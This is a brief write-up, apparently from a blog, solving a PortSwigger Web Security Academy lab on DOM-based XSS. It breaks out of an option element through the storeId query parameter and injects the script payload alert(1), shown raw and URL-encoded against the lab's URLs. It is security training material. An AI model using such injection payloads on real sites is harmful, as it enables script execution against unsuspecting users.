Skip to content

Port Swigger DOM XSS in document.write sink using 1

DOM XSS in document.write sink using source location.search inside a select element

Solution

Open website: https://0a1500ed0423228280b50dcc00ad00de.web-security-academy.net/product?productId=1

https://0ae8004403dd448580c1dfc8001d0055.web-security-academy.net/product?productId=1

Edit storeId

Modyfication sttoreId
https://0ae8004403dd448580c1dfc8001d0055.web-security-academy.net/product?productId=1&storeId=test_xss

Create a payload

Payload: &storeId=</option><script>alert(1)</script>
---
https://0ae8004403dd448580c1dfc8001d0055.web-security-academy.net/product?productId=1&storeId=%3C/option%3E%3Cscript%3Ealert(1)%3C/script%3E

Solved